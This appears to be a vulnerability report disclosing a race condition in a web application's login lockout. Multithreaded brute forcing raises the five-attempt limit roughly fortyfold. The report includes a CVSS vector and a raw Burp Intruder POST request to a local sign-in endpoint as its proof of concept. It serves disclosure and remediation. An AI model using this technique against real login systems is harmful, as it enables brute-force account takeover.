Description

A threaded race condition exists in how the application handles authentication attempts in the application. The application recognizes and protects against single-threaded attempts with a five-attempt lockout function. By increasing threads in an authentication brute force attack it is possible to exponentially increase the number of allowed attempts without a lockout. Tester was able to increase attempts by a factor of 40 (5 attempts times 40 threads). Additional thread counts were inconsistent, but in one testing scenario the tester was able to find a valid authentication attempt at number 499 (at the highest).

CVSS - AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Proof of Concept

Authentication Brute Force PoC - This is the Burp Intruder payload

POST /api/v1/signin HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-CSRF-Token: jA18mk7hOGTpj+qgmFfs0z7Mx/EtYoeliFT9nphfSQ44r7+ETthl4fJMvNnp7HQeMYYYXd5Ws34mSdltjpvRtg==
Content-Length: 88
Origin: http://localhost:8080
DNT: 1
Connection: close
Cookie: _zammad_session_a138cfd0f37=d7a577940ea805561fe5f8ad93998bd3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"username":"[email protected]","password":"PassworD123!","fingerprint":"-781305443"}